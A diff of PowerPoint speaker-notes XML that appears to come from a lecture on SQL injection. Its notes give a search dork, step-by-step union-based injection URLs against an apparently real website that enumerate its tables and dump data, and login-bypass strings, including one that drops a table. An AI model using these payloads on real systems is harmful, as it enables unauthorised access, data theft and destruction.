-            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>8. http://www.raahauges.com/view-news.php?id=null union all select 1,2,group_concat(date,0x3a,time,0x3a,title,0x3a,details),4,5 from events --</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Login hacked: admin' or 1=1 LIMIT 1 – </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Login</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t> hacked: admin’ or 1=1; Drop table </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>userinfo</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t> --  &lt;change a line of code if ($result = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>mysqli_multi_query</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>($conn, $</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>sql</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>)) {</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
               <a:solidFill>
                 <a:schemeClr val="tx1"/>
               </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" i="0" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
+              <a:effectLst/>
+              <a:latin typeface="+mn-lt"/>
+              <a:ea typeface="+mn-ea"/>
+              <a:cs typeface="+mn-cs"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -5215,6 +4797,898 @@
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
               <a:t>23</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1263682537"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide23.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Slide Image Placeholder 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Notes Placeholder 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Login normal: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>quangsonpro, langtutuoiteen</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Login hacked: admin’ or 1=1</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="0" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> --</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" i="0" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="10"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{35845946-0CF3-4C0F-AF5C-F563F65A0652}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:pPr/>
+              <a:t>24</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1442560568"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide24.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Slide Image Placeholder 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Notes Placeholder 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Login normal: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>quangsonpro, langtutuoiteen</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="10"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{35845946-0CF3-4C0F-AF5C-F563F65A0652}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:pPr/>
+              <a:t>25</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2368136216"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide25.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Slide Image Placeholder 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Notes Placeholder 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>1. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>inurl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>=.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>php?id</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>=</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>http://www.raahauges.com/view-news.php?id=8</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>2. http://www.raahauges.com/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>view-news.php?id</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>=‘</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>3. http://www.raahauges.com/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>view-news.php?id</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>=‘</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>4. http://www.raahauges.com/view-news.php?id=8</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>order</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>by</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>5</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> --</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>5. http://www.raahauges.com/view-news.php?id=null</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> union all select 1,2,3,4,5 -- </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>6. http://www.raahauges.com/view-news.php?id=null union all select 1,2,group_concat(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>table_name</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>),4,5 from </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>information_schema.tables</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> where </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>table_schema</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>=database() --</a:t>
